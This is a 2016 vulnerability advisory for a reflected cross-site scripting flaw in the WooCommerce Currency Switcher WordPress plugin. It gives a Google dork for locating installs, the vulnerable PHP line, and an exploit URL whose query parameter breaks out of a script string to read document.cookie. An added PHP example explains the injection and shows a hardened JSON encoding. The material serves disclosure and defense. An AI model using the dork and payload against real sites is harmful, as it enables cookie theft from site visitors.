WordPress WooCommerce Currency Switcher 1.1.5.1 Cross Site Scripting
Posted on 10 February 2016
# Exploit Title: WooCommerce Currency Switcher XSS
# Google Dork: index of /wp-content/plugins/woocomerce-currency-switcher/
# Date: 06 Feb 2016
# Exploit Author: Ben Khlifa Fahmi (from Tunisian Whitehats Security)
# Software Link: https://downloads.wordpress.org/plugin/woocommerce-currency-switcher.zip
# Version: 1.1.5.1

Vulnerable Code :
Page : /wp-content/plugins/woocomerce-currency-switcher/index.php
Vulnerable Function : wp_head()
Line 765:
    <?php if (!empty($_GET)): ?>
[-]     woocs_array_of_get = '<?php echo json_encode($_GET); ?>';
    <?php endif; ?>
--------------------------------------
Exploit Link : http://localhost/?s=xss';alert(document.cookie);<!--&post_type=product
--------------------------------------
Special Thanks to all Whitehats Security : Amine Zemzemi, Youssef Werhani, Bilel El Jamii, Bayrem Ghanmi, Charfeddin Hamdi, Med Achref and all our members :D.
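
Why the line 765 pattern is injectable, and one way to encode the same data safely, as an added example that is not code from the plugin or from the advisory's author. The function names and the hardened form are assumptions (this is not the vendor's fix); the sample input is constructed from the exploit link above.

```php
<?php
// Constructed sample input: the query parameters from the advisory's exploit link.
$get = [
    's'         => "xss';alert(document.cookie);<!--",
    'post_type' => 'product',
];

// The pattern from line 765: default json_encode() output echoed between
// single quotes. json_encode() does not escape ' unless asked to, so the quote
// in "s" ends the JavaScript string literal and the rest is parsed as script.
function render_vulnerable(array $get): string
{
    return "woocs_array_of_get = '" . json_encode($get) . "';";
}

// Hardened form (an assumption, not the plugin's actual fix): emit the JSON as
// a JavaScript object literal, with no surrounding quotes, and use the
// JSON_HEX_* flags so ', <, > and & (and " inside values) are written as
// \uXXXX escapes. Code that reads woocs_array_of_get would then receive an
// object instead of a JSON string.
function render_hardened(array $get): string
{
    $flags = JSON_HEX_TAG | JSON_HEX_APOS | JSON_HEX_QUOT | JSON_HEX_AMP;
    $json  = json_encode($get, $flags);
    if ($json === false) {
        // Invalid UTF-8 in a parameter makes json_encode() fail; fall back to
        // an empty object rather than emitting broken script.
        $json = '{}';
    }
    return 'woocs_array_of_get = ' . $json . ';';
}

$bad  = render_vulnerable($get);
$good = render_hardened($get);
echo $bad, PHP_EOL, $good, PHP_EOL;

// Does the vulnerable line still carry the raw quote that closes the string?
var_dump(strpos($bad, "';alert(") !== false);
// Is the hardened line free of raw ', <, > and & characters?
var_dump(strpbrk($good, "'<>&") === false);
```

Keeping the single quotes and adding only the JSON_HEX_* flags would stop the breakout, but the JavaScript string literal would decode the \uXXXX escapes before any later JSON parsing, so values containing a double quote or backslash would yield invalid JSON; that is why the hardened form drops the quotes.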